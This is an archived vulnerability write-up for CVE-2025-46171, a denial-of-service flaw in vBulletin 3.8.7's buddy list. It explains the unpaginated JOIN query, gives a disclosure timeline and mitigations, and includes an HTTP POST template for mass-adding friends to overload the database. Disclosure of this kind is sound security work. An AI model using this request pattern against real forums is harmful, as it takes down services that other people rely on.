Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-46171 PoC — vBulletin 安全漏洞

Source
Associated Vulnerability
Title:vBulletin 安全漏洞 (CVE-2025-46171)
Description:vBulletin是美国vBulletin公司的一款基于PHP和MySQL的开源Web论坛程序。 vBulletin 3.8.7版本存在安全漏洞,该漏洞源于misc.php?do=buddylist端点处理不当,可能导致拒绝服务攻击。
Description
Writeup of a Denial of Service vulnerability in the vBulletin 3.8.7 friends list.
Readme

# vBulletin 3.x.x - DoS via Buddy List Overload

## Summary
The `/misc.php?do=buddylist` endpoint runs a single, large JOIN query that retrieves all buddies along with their user and session information to check online status. Because this query processes the entire buddy list without pagination or result limits, it becomes extremely resource-intensive and can overload the database when the list grows large.

This issue is easy to exploit and requires minimal setup. No special privileges are needed beyond a basic user account. Simply inflating the buddy list is enough to put serious strain on the database.


## Affected Versions
- ✅ **Confirmed vulnerable**: vBulletin 3.8.7  

## Technical Details

This SQL query retrieves buddy details along with session information to check online status for every buddy. Because it processes the entire buddy list and joins with session data for each entry, the query becomes very large and resource-intensive.

```php
$buddys = $db->query_read_slave("
    SELECT
        user.username,
        (user.options & " . $vbulletin->bf_misc_useroptions['invisible'] . ") AS invisible,
        user.userid,
        session.lastactivity
    FROM " . TABLE_PREFIX . "userlist AS userlist
    LEFT JOIN " . TABLE_PREFIX . "user AS user ON (user.userid = userlist.relationid)
    LEFT JOIN " . TABLE_PREFIX . "session AS session ON (session.userid = user.userid)
    WHERE userlist.userid = {$vbulletin->userinfo['userid']}
        AND userlist.relationid = user.userid
        AND type = 'buddy'
    ORDER BY username ASC, session.lastactivity DESC
");
```

## Timeline

* **April 17, 2025**: Vulnerability discovered
* **April 18, 2025**: CVE request submitted to MITRE
* **May 29, 2025**: CVE-2025-46171 assigned
* **June 27, 2025**: Public disclosure

## Exploitation

### Mass Adding Friends
Bulk friend lists can be populated by POSTing to `/profile.php` with `listbits`. This can be repeated for thousands of user IDs to inflate the buddy list:

```html
POST /profile.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

securitytoken=TOKEN
&ajax=1
&do=updatelist
&userlist=buddy
&listbits[buddy_original][USER_ID]=USER_ID
&listbits[buddy][USER_ID]=USER_ID
&listbits[friend][USER_ID]=USER_ID
&listbits[friend_original][USER_ID]=USER_ID
...
```

## Impact
On large forums, this can cause severe query lag or crash the MySQL instance altogether.

## Mitigation:
* Apply query pagination or limit the number of buddy entries retrieved per request
* Apply rate limiting and validation on buddy list modifications
File Snapshot

[4.0K] /data/pocs/e6e25203ff25c13264eaef5957450741574be6f4 └── [2.5K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.